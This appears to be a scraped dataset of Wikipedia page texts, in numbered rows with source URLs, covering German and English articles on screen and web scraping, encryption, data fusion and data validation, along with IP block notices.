jedoch zun chst eine g ltige Session-ID holen und dann die gew nschten Daten herunterladen. Das folgende Beispiel zeigt einen JavaScript-basierten Screen Scraper, der die von eBay benutzte Strategie umging. Es lud sich zun chst die Hauptseite herunter, extrahierte mit einem regul ren Ausdruck eine g ltige URL (in diesem Fall die Liste der Auktionen, bei denen Disketten ersteigert werden) und ffnete diese im Browser. Neben der Zweckentfremdung von Session-IDs gibt es weitere M glichkeiten, das Benutzerverhalten zu berpr fen: Alle diese Methoden beinhalten jedoch gewisse Problematiken, etwa weil Referrer-Angaben nicht zwingend sind, weil eingebettete Elemente m glicherweise von einem Proxy oder aus dem Cache geliefert werden oder weil der Anwender schlichtweg die Anzeige von Grafiken oder das Ausf hren von JavaScript deaktiviert hat. Der Server versucht vor dem Ausliefern der Daten zu erkennen, ob es sich beim Client um einen von einem Menschen benutzen Browser oder um einen Bot handelt. Eine h ufig eingesetzte Methode daf r ist die Verwendung von Captchas. Dabei wird dem Client eine Aufgabe gestellt, welche f r Menschen m glichst einfach, f r eine Maschine jedoch sehr schwer l sbar ist. Dies kann eine Rechenaufgabe oder das Abtippen von Buchstaben sein, wobei oft die Schwierigkeit f r die Maschine im Erkennen der Aufgabe liegt. Dies kann z. B. erreicht werden, indem die Rechenaufgabe nicht als Text, sondern als Bild bermittelt wird. Captchas werden f r bestimmte Online-Dienste wie Foren, Wikis, Downloadseiten oder Online-Netzwerke eingesetzt etwa gegen automatisches Registrieren, automatisches Aussp hen von Profilen anderer Nutzer sowie automatische Downloads durch Bots. Mitunter muss ein Client erst nach einer bestimmten Anzahl von Aktionen ein Captcha l sen. Theoretisch lassen sich f r alle Captchas auch Bots entwickeln, die diese Aufgaben auf Basis von Optical Character Recognition (Extraktion der Aufgabe aus einem Bild) l sen k nnen, so dass dieser Schutz umgangen werden kann. Des Weiteren besteht die M glichkeit, die Teilaufgabe an einen Menschen weiterzugeben, so dass dieser das Captcha f r die Maschine l st. Beides bedeutet jedoch einen erheblichen Mehraufwand f r den Botbetreiber. Die Informationen werden in f r Maschinen nicht oder nur schwer lesbarer Form angeboten. Etwa als Grafik, in Flash-Animationen oder Java-Applets. Allerdings leidet hierunter h ufig die Gebrauchstauglichkeit. Zur Verschleierung der Daten kann auch JavaScript zum Einsatz kommen. Diese Methode wird vor allem auch gegen E-Mail-Harvester eingesetzt, die E-Mail-Adressen zur Versendung von Spam sammeln. Die eigentlichen Daten werden nicht im HTML-Code bertragen, sondern werden erst durch JavaScript in die Webseite geschrieben. Die Daten k nnen zus tzlich verschl sselt bertragen und erst beim Anzeigen der Seite entschl sselt werden. Mit Hilfe eines Obfuscators kann der Programmcode verschleiert werden, um die Entwicklung eines Screen Scrapers zu erschweren. Einfaches Beispiel zur Verschleierung einer E-Mail-Adresse mit JavaScript (ohne Verschl sselung): Je nach Komplexit t der Aufgabe muss ein Screen Scraper neu programmiert werden. Mithilfe von Toolkits lassen sich Screen Scraper jedoch auch ohne Programmierkenntnisse erstellen. F r die Implementierungsform gibt es verschiedene M glichkeiten, etwa als Bibliothek, als Proxy-Server oder als eigenst ndiges Programm. Piggy Bank war eine vom Simile-Projekt am MIT entwickelte Erweiterung f r Firefox. Mit ihr lie en sich Verkn pfungen von Diensten verschiedener Anbieter realisieren. Es erkannte automatisch auf einer Webseite angebotene RDF-Ressourcen. Diese konnten gespeichert, verwaltet und mit anderen Diensten (etwa geographische Informationen mit Google Maps) kombiniert werden. Piggy Bank wird nicht mehr angeboten. Als Ersatz bietet sich Selenium 2 an, womit man einen Web-Browser wie Firefox programmatisch steuern kann. Eine weitere bekannte Firefox-Erweiterung ist Greasemonkey. Sie erlaubt es dem Nutzer eigene JavaScript-Dateien im Browser auszuf hren, die das Erscheinungsbild und Verhalten der angezeigten Webseite individualisieren k nnen, ohne einen Zugriff auf die eigentliche Webseite zu ben tigen. Dadurch ist es beispielsweise m glich, Webseiten um Funktionen zu erweitern, Fehler in der Darstellung zu beheben, Inhalte von anderen Webseiten einzubinden und wiederkehrende Aufgaben automatisch zu erledigen. A9 von Amazon ist ein Beispiel f r eine zentralisierte Remix-Architektur. A9 kann Suchergebnisse aus verschiedenen Webdiensten wie Windows Live, Wikipedia, answers.com und vielen anderen in einem Fenster anzeigen. Programmierkundige nutzen oft Skriptsprachen f r ma geschneiderte Screenscraping-Projekte. F r Python etwa gibt es die Programmbibliothek Beautiful Soup, 3 die den Umgang mit real existierendem HTML erleichtert. Ebenfalls auf Python basiert die dom nenspezifische Sprache redex (Regular Document Expressions) 4 von Marcin Wojnarski, die speziell f r das Webscraping geschaffen wurde und die L cke zwischen den praktischen, aber kleinteiligen regul ren Ausdr cken und der m chtigen, aber sehr rigiden XPath-Syntax schlie en soll. 5 Beim Scraping von Webseiten fremder Anbieter muss auf die Einhaltung der Urheberrechte geachtet werden, vor allem wenn die Inhalte ber ein eigenes Angebot eingebunden werden. Eine rechtliche Grauzone ist dagegen das Anbieten von Programmen, die ein clientseitiges Screen Scraping erm glichen. Einige Anbieter verbieten das automatische Auslesen von Daten auch explizit in den Nutzungsbedingungen. 6 Ein weiteres Problem stellt unter Umst nden das Ausblenden von Informationen dar, etwa von Werbung oder rechtlich relevanten Informationen wie Disclaimer, Warnungen oder gar die automatische Best tigung der AGB durch den Screen Scraper, ohne dass der Nutzer diese zu Gesicht bekommt. |
329 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=3 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Data scraping. |
330 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=info | This page is a member of 11 hidden categories (help): Pages transcluded onto the current version of this page (help): |
331 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Comparison_of_feed_aggregators | The following is a comparison of RSS feed aggregators. Often e-mail programs and web browsers have the ability to display RSS feeds. They are listed here, too. Many BitTorrent clients support RSS feeds for broadcasting (see Comparison of BitTorrent clients). With the rise of cloud computing, some cloud based services offer feed aggregation. They are listed here as well. 6.5.6 (May 13, 2024; 3 months ago (2024 05 13) 53 ) 4.8.6 (May 13, 2024; 3 months ago (2024 05 13) 54 ) 4.7.9 (March 2, 2021; 3 years ago (2021 03 02) 55 ) 4.14.3 (May 30, 2024; 2 months ago (2024 05 30) 56 ) 3.7.6 (May 28, 2024; 2 months ago (2024 05 28) 57 ) Netscape Messenger 9 is a fork of Mozilla Thunderbird and has the same features. Web browsers and Internet suites have for browser plugin a N A, because they don't need it. |
332 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Encryption | In cryptography, encryption is the process of transforming (more specifically, encoding) information in a way that, ideally, only authorized parties can decode. This process converts the original representation of the information, known as plaintext, into an alternative form known as ciphertext. Despite its goal, encryption does not itself prevent interference but denies the intelligible content to a would-be interceptor. For technical reasons, an encryption scheme usually uses a pseudo-random encryption key generated by an algorithm. It is possible to decrypt the message without possessing the key but, for a well-designed encryption scheme, considerable computational resources and skills are required. An authorized recipient can easily decrypt the message with the key provided by the originator to recipients but not to unauthorized users. Historically, various forms of encryption have been used to aid in cryptography. Early encryption techniques were often used in military messaging. Since then, new techniques have emerged and become commonplace in all areas of modern computing. 1 Modern encryption schemes use the concepts of public-key and symmetric-key. 1 Modern encryption techniques ensure security because modern computers are inefficient at cracking the encryption. One of the earliest forms of encryption is symbol replacement, which was first found in the tomb of Khnumhotep II, who lived in 1900 BC Egypt. Symbol replacement encryption is “non-standard, which means that the symbols require a cipher or key to understand. This type of early encryption was used throughout Ancient Greece and Rome for military purposes. 2 One of the most famous military encryption developments was the Caesar cipher, which was a system in which a letter in normal text is shifted down a fixed number of positions down the alphabet to get the encoded letter. A message encoded with this type of encryption could be decoded with the fixed number on the Caesar cipher. 3 Around 800 AD, Arab mathematician Al-Kindi developed the technique of frequency analysis which was an attempt to systematically crack ciphers, including the Caesar cipher. 2 This technique looked at the frequency of letters in the encrypted message to determine the appropriate shift. This technique was rendered ineffective after the creation of the polyalphabetic cipher, described by Al-Qalqashandi (1355 1418) 4 and Leon Battista Alberti (in 1465), which incorporated different sets of languages. In order for frequency analysis to be useful, the person trying to decrypt the message would need to know which language the sender chose. 2 Around 1790, Thomas Jefferson theorized a cipher to encode and decode messages in order to provide a more secure way of military correspondence. The cipher, known today as the Wheel Cipher or the Jefferson Disk, although never actually built, was theorized as a spool that could jumble an English message up to 36 characters. The message could be decrypted by plugging in the jumbled message to a receiver with an identical cipher. 5 A similar device to the Jefferson Disk, the M 94, was developed in 1917 independently by US Army Major Joseph Mauborne. This device was used in U.S. military communications until 1942. 6 In World War II, the Axis powers used a more advanced version of the M 94 called the Enigma Machine. The Enigma Machine was more complex because unlike the Jefferson Wheel and the M 94, each day the jumble of letters switched to a completely new combination. Each day's combination was only known by the Axis, so many thought the only way to break the code would be to try over 17,000 combinations within 24 hours. 7 The Allies used computing power to severely limit the number of reasonable combinations they needed to check every day, leading to the breaking of the Enigma Machine. Today, encryption is used in the transfer of communication over the Internet for security and commerce. 1 As computing power continues to increase, computer encryption is constantly evolving to prevent eavesdropping attacks. 8 With one of the first "modern" cipher suites, DES, utilizing a 56 bit key with 72,057,594,037,927,936 possibilities being able to be cracked in 22 hours and 15 minutes by EFF's DES cracker in 1999, which used a brute-force method of cracking. Modern encryption standards often use stronger key sizes often 256, like AES (256 bit mode), TwoFish, ChaCha20 Poly1305, Serpent (configurable up to 512 bit). Cipher suites utilizing a 128 bit or higher key, like AES, will not be able to be brute-forced due to the total amount of keys of 3.4028237e 38 possibilities. The most likely option for cracking ciphers with high key size is to find vulnerabilities in the cipher itself, like inherent biases and backdoors or by exploiting physical side effects through Side-channel attacks. For example, RC4, a stream cipher, was cracked due to inherent biases and vulnerabilities in the cipher. In the context of cryptography, encryption serves as a mechanism to ensure confidentiality. 1 Since data may be visible on the Internet, sensitive information such as passwords and personal communication may be exposed to potential interceptors. 1 The process of encrypting and decrypting messages involves keys. The two main types of keys in cryptographic systems are symmetric-key and public-key (also known as asymmetric-key). 9 10 Many complex cryptographic algorithms often use simple modular arithmetic in their implementations. 11 In symmetric-key schemes, 12 the encryption and decryption keys are the same. Communicating parties must have the same key in order to achieve secure communication. The German Enigma Machine utilized a new symmetric-key each day for encoding and decoding messages. In public-key encryption schemes, the encryption key is published for anyone to use and encrypt messages. However, only the receiving party has access to the decryption key that enables messages to be read. 13 Public-key encryption was first described in a secret document in 1973; 14 beforehand, all encryption schemes were symmetric-key (also called private-key). 15 : 478 Although published subsequently, the work of Diffie and Hellman was published in a journal with a large readership, and the value of the methodology was explicitly described. 16 The method became known as the Diffie-Hellman key exchange. RSA (Rivest Shamir Adleman) is another notable public-key cryptosystem. Created in 1978, it is still used today for applications involving digital signatures. 17 Using number theory, the RSA algorithm selects two prime numbers, which help generate both the encryption and decryption keys. 18 A publicly available public-key encryption application called Pretty Good Privacy (PGP) was written in 1991 by Phil Zimmermann, and distributed free of charge with source code. PGP was purchased by Symantec in 2010 and is regularly updated. 19 Encryption has long been used by militaries and governments to facilitate secret communication. It is now commonly used in protecting information within many kinds of civilian systems. For example, the Computer Security Institute reported that in 2007, 71% of companies surveyed utilized encryption for some of their data in transit, and 53% utilized encryption for some of their data in storage. 20 Encryption can be used to protect data "at rest", such as information stored on computers and storage devices (e.g. USB flash drives). In recent years, there have been numerous reports of confidential data, such as customers' personal records, being exposed through loss or theft of laptops or backup drives; encrypting such files at rest helps protect them if physical security measures fail. 21 22 23 Digital rights management systems, which prevent unauthorized use or reproduction of copyrighted material and protect software against reverse engineering (see also copy protection), is another somewhat different example of using encryption on data at rest. 24 Encryption is also used to protect data in transit, for example data being transferred via networks (e.g. the Internet, e-commerce), mobile telephones, wireless microphones, wireless intercom systems, Bluetooth devices and bank automatic teller machines. There have been numerous reports of data in transit being intercepted in recent years. 25 Data should also be encrypted when transmitted across networks in order to protect against eavesdropping of network traffic by unauthorized users. 26 Conventional methods for permanently deleting data from a storage device involve overwriting the device's whole content with zeros, ones, or other patterns a process which can take a significant amount of time, depending on the capacity and the type of storage medium. Cryptography offers a way of making the erasure almost instantaneous. This method is called crypto-shredding. An example implementation of this method can be found on iOS devices, where the cryptographic key is kept in a dedicated 'effaceable storage'. 27 Because the key is stored on the same device, this setup on its own does not offer full privacy or security protection if an unauthorized person gains physical access to the device. Encryption is used in the 21st century to protect digital data and information systems. As computing power increased over the years, encryption technology has only become more advanced and secure. However, this advancement in technology has also exposed a potential limitation of today's encryption methods. The length of the encryption key is an indicator of the strength of the encryption method. 28 For example, the original encryption key, DES (Data Encryption Standard), was 56 bits, meaning it had 2 56 combination possibilities. With today's computing power, a 56 bit key is no longer secure, being vulnerable to brute force attacks. 29 Quantum computing utilizes properties of quantum mechanics in order to process large amounts of data simultaneously. Quantum computing has been found to achieve computing speeds thousands of times faster than today's supercomputers. 30 This computing power presents a challenge to today's encryption technology. For example, RSA encryption utilizes the multiplication of very large prime numbers to create a semiprime number for its public key. Decoding this key without its private key requires this semiprime number to be factored, which can take a very long time to do with modern computers. It would take a supercomputer anywhere between weeks to months to factor in this key. citation needed However, quantum computing can use quantum algorithms to factor this semiprime number in the same amount of time it takes for normal computers to generate it. This would make all data protected by current public-key encryption vulnerable to quantum computing attacks. 31 Other encryption techniques like elliptic curve cryptography and symmetric key encryption are also vulnerable to quantum computing. citation needed While quantum computing could be a threat to encryption security in the future, quantum computing as it currently stands is still very limited. Quantum computing currently is not commercially available, cannot handle large amounts of code, and only exists as computational devices, not computers. 32 Furthermore, quantum computing advancements will be able to be utilized in favor of encryption as well. The National Security Agency (NSA) is currently preparing post-quantum encryption standards for the future. 33 Quantum encryption promises a level of security that will be able to counter the threat of quantum computing. 32 Encryption is an important tool but is not sufficient alone to ensure the security or privacy of sensitive information throughout its lifetime. Most applications of encryption protect information only at rest or in transit, leaving sensitive data in clear text and potentially vulnerable to improper disclosure during processing, such as by a cloud service for example. Homomorphic encryption and secure multi-party computation are emerging techniques to compute encrypted data; these techniques are general and Turing complete but incur high computational and or communication costs. In response to encryption of data at rest, cyber-adversaries have developed new types of attacks. These more recent threats to encryption of data at rest include cryptographic attacks, 34 stolen ciphertext attacks, 35 attacks on encryption keys, 36 insider attacks, data corruption or integrity attacks, 37 data destruction attacks, and ransomware attacks. Data fragmentation 38 and active defense 39 data protection technologies attempt to counter some of these attacks, by distributing, moving, or mutating ciphertext so it is more difficult to identify, steal, corrupt, or destroy. 40 The question of balancing the need for national security with the right to privacy has been debated for years, since encryption has become critical in today's digital society. The modern encryption debate 41 started around the '90s when US government tried to ban cryptography because, according to them, it would threaten national security. The debate is polarized around two opposing views. Those who see strong encryption as a problem making it easier for criminals to hide their illegal acts online and others who argue that encryption keep digital communications safe. The debate heated up in 2014, when Big Tech like Apple and Google set encryption by default in their devices. This was the start of a series of controversies that puts governments, companies and internet users at stake. Encryption, by itself, can protect the confidentiality of messages, but other techniques are still needed to protect the integrity and authenticity of a message; for example, verification of a message authentication code (MAC) or a digital signature usually done by a hashing algorithm or a PGP signature. Authenticated encryption algorithms are designed to provide both encryption and integrity protection together. Standards for cryptographic software and hardware to perform encryption are widely available, but successfully using encryption to ensure security may be a challenging problem. A single error in system design or execution can allow successful attacks. Sometimes an adversary can obtain unencrypted information without directly undoing the encryption. See for example traffic analysis, TEMPEST, or Trojan horse. 42 Integrity protection mechanisms such as MACs and digital signatures must be applied to the ciphertext when it is first created, typically on the same device used to compose the message, to protect a message end-to-end along its full transmission path; otherwise, any node between the sender and the encryption agent could potentially tamper with it. Encrypting at the time of creation is only secure if the encryption device itself has correct keys and has not been tampered with. If an endpoint device has been configured to trust a root certificate that an attacker controls, for example, then the attacker can both inspect and tamper with encrypted data by performing a man-in-the-middle attack anywhere along the message's path. The common practice of TLS interception by network operators represents a controlled and institutionally sanctioned form of such an attack, but countries have also attempted to employ such attacks as a form of control and censorship. 43 Even when encryption correctly hides a message's content and it cannot be tampered with at rest or in transit, a message's length is a form of metadata that can still leak sensitive information about the message. For example, the well-known CRIME and BREACH attacks against HTTPS were side-channel attacks that relied on information leakage via the length of encrypted content. 44 Traffic analysis is a broad class of techniques that often employs message lengths to infer sensitive implementation about traffic flows by aggregating information about a large number of messages. Padding a message's payload before encrypting it can help obscure the cleartext's true length, at the cost of increasing the ciphertext's size and introducing or increasing bandwidth overhead. Messages may be padded randomly or deterministically, with each approach having different tradeoffs. Encrypting and padding messages to form padded uniform random blobs or PURBs is a practice guaranteeing that the cipher text leaks no metadata about its cleartext's content, and leaks asymptotically minimal O ( log log M ) displaystyle O( log log M) information via its length. 45 |
333 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:MyContributions | This IP address is currently blocked. The latest block log entry is provided below for reference: This user or IP address is currently globally blocked. If the block is marked as locally disabled, this means that it applies on other sites, but a local administrator has decided to disable it on this wiki. The global block log entry is provided below for reference: No changes were found matching these criteria. |
334 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_fusion | Data fusion is the process of integrating multiple data sources to produce more consistent, accurate, and useful information than that provided by any individual data source. Data fusion processes are often categorized as low, intermediate, or high, depending on the processing stage at which fusion takes place. 1 Low-level data fusion combines several sources of raw data to produce new raw data. The expectation is that fused data is more informative and synthetic than the original inputs. For example, sensor fusion is also known as (multi-sensor) data fusion and is a subset of information fusion. The concept of data fusion has origins in the evolved capacity of humans and animals to incorporate information from multiple senses to improve their ability to survive. For example, a combination of sight, touch, smell, and taste may indicate whether a substance is edible. 2 In the mid 1980s, the Joint Directors of Laboratories formed the Data Fusion Subpanel (which later became known as the Data Fusion Group). With the advent of the World Wide Web, data fusion thus included data, sensor, and information fusion. The JDL DFIG introduced a model of data fusion that divided the various processes. Currently, the six levels with the Data Fusion Information Group (DFIG) model are: Although the JDL Model (Level 1 4) is still in use today, it is often criticized for its implication that the levels necessarily happen in order and also for its lack of adequate representation of the potential for a human-in-the-loop. The DFIG model (Level 0 5) explored the implications of situation awareness, user refinement, and mission management. 3 Despite these shortcomings, the JDL DFIG models are useful for visualizing the data fusion process, facilitating discussion and common understanding, 4 and important for systems-level information fusion design. 3 5 In the geospatial (GIS) domain, data fusion is often synonymous with data integration. In these applications, there is often a need to combine diverse data sets into a unified (fused) data set which includes all of the data points and time steps from the input data sets. The fused data set is different from a simple combined superset in that the points in the fused data set contain attributes and metadata which might not have been included for these points in the original data set. A simplified example of this process is shown below where data set " " is fused with data set to form the fused data set . Data points in set " " have spatial coordinates X and Y and attributes A1 and A2. Data points in set have spatial coordinates X and Y and attributes B1 and B2. The fused data set contains all points and attributes. In a simple case where all attributes are uniform across the entire analysis domain, the attributes may be simply assigned: M?, N?, Q?, R? to M, N, Q, R. In a real application, attributes are not uniform and some type of interpolation is usually required to properly assign attributes to the data points in the fused set. In a much more complicated application, marine animal researchers use data fusion to combine animal tracking data with bathymetric, meteorological, sea surface temperature (SST) and animal habitat data to examine and understand habitat utilization and animal behavior in reaction to external forces such as weather or water temperature. Each of these data sets exhibit a different spatial grid and sampling rate so a simple combination would likely create erroneous assumptions and taint the results of the analysis. But through the use of data fusion, all data and attributes are brought together into a single view in which a more complete picture of the environment is created. This enables scientists to identify key locations and times and form new insights into the interactions between the environment and animal behaviors. In the figure at right, rock lobsters are studied off the coast of Tasmania. Hugh Pederson of the University of Tasmania used data fusion software to fuse southern rock lobster tracking data (color-coded for in yellow and black for day and night, respectively) with bathymetry and habitat data to create a unique 4D picture of rock lobster behavior. In applications outside of the geospatial domain, differences in the usage of the terms Data integration and Data fusion apply. In areas such as business intelligence, for example, data integration is used to describe the combining of data, whereas data fusion is integration followed by reduction or replacement. Data integration might be viewed as set combination wherein the larger set is retained, whereas fusion is a set reduction technique with improved confidence. The data from the different sensing technologies can be combined in intelligent ways to determine the traffic state accurately. A Data fusion based approach that utilizes the road side collected acoustic, image and sensor data has been shown to combine the advantages of the different individual methods. 6 In many cases, geographically dispersed sensors are severely energy- and bandwidth-limited. Therefore, the raw data concerning a certain phenomenon are often summarized in a few bits from each sensor. When inferring on a binary event (i.e., H 0 displaystyle mathcal H 0 or H 1 displaystyle mathcal H 1 ), in the extreme case only binary decisions are sent from sensors to a Decision Fusion Center (DFC) and combined in order to obtain improved classification performance. 7 8 9 With a multitude of built-in sensors including motion sensor, environmental sensor, position sensor, a modern mobile device typically gives mobile applications access to a number of sensory data which could be leveraged to enhance the contextual awareness. Using signal processing and data fusion techniques such as feature generation, feasibility study and principal component analysis (PCA) such sensory data will greatly improve the positive rate of classifying the motion and contextual relevant status of the device. 10 Many context-enhanced information techniques are provided by Snidaro, et al. 11 12 Gaussian processes are a popular machine learning model. If an auto-regressive relationship between the data is assumed, and each data source is assumed to be a Gaussian process, this constitutes a non-linear Bayesian regression problem. 13 Many data fusion methods assume common conditional distributions across several data sources. 14 Recently, methods have been developed to enable efficient estimation within the resulting semiparametric model. 15 |
335 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_validation | In computing, data validation or input validation is the process of ensuring data has undergone data cleansing to confirm they have data quality, that is, that they are both correct and useful. It uses routines, often called "validation rules", "validation constraints", or "check routines", that check for correctness, meaningfulness, and security of data that are input to the system. The rules may be implemented through the automated facilities of a data dictionary, or by the inclusion of explicit application program validation logic of the computer and its application. This is distinct from formal verification, which attempts to prove or disprove the correctness of algorithms for implementing a specification or property. Data validation is intended to provide certain well-defined guarantees for fitness and consistency of data in an application or automated system. Data validation rules can be defined and designed using various methodologies, and be deployed in various contexts. 1 Their implementation can use declarative data integrity rules, or procedure-based business rules. 2 The guarantees of data validation do not necessarily include accuracy, and it is possible for data entry errors such as misspellings to be accepted as valid. Other clerical and or computer controls may be applied to reduce inaccuracy within a system. In evaluating the basics of data validation, generalizations can be made regarding the different kinds of validation according to their scope, complexity, and purpose. For example: Data type validation is customarily carried out on one or more simple data fields. The simplest kind of data type validation verifies that the individual characters provided through user input are consistent with the expected characters of one or more known primitive data types as defined in a programming language or data storage and retrieval mechanism. For example, an integer field may require input to use only characters 0 through 9. Simple range and constraint validation may examine input for consistency with a minimum maximum range, or consistency with a test for evaluating a sequence of characters, such as one or more tests against regular expressions. For example, a counter value may be required to be a non-negative integer, and a password may be required to meet a minimum length and contain characters from multiple categories. Code and cross-reference validation includes operations to verify that data is consistent with one or more possibly-external rules, requirements, or collections relevant to a particular organization, context or set of underlying assumptions. These additional validity constraints may involve cross-referencing supplied data with a known look-up table or directory information service such as LDAP. For example, a user-provided country code might be required to identify a current geopolitical region. Structured validation allows for the combination of other kinds of validation, along with more complex processing. Such complex processing may include the testing of conditional constraints for an entire complex data object or set of process operations within a system. Consistency validation ensures that data is logical. For example, the delivery date of an order can be prohibited from preceding its shipment date. Multiple kinds of data validation are relevant to 10 digit pre 2007 ISBNs (the 2005 edition of ISO 2108 required ISBNs to have 13 digits from 2007 onwards 3 ). Failures or omissions in data validation can lead to data corruption or a security vulnerability. 4 Data validation checks that data are fit for purpose, 5 valid, sensible, reasonable and secure before they are processed. |
336 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-4 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web 